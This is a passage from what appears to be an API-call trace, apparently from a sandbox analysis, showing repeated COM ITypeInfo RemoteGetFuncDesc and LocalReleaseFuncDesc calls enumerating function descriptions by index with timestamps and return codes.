This=0x1d39d552b18, index=0x84, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x85, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x86, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x87, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x88, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x89, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x90, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x91, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x92, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x93, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x94, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x95, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x96, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x97, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x98, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x99, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.300] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.300] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa0, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa1, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa2, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa3, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa4, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa5, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa6, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa7, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa8, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa9, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaa, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xab, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xac, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xad, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xae, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaf, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.301] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.301] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb0, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb1, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb2, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb3, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb4, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb5, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb6, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb7, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb8, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb9, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xba, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbb, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbc, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbd, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbe, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbf, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc0, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc1, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc2, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc3, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.302] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc4, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.302] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc5, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc6, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc7, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc8, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc9, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xca, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcb, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcc, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcd, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xce, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcf, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd0, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd1, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd2, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd3, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd4, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd5, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd6, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd7, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd8, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.303] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.303] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd9, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xda, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdb, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdc, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdd, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xde, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xdf, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe0, 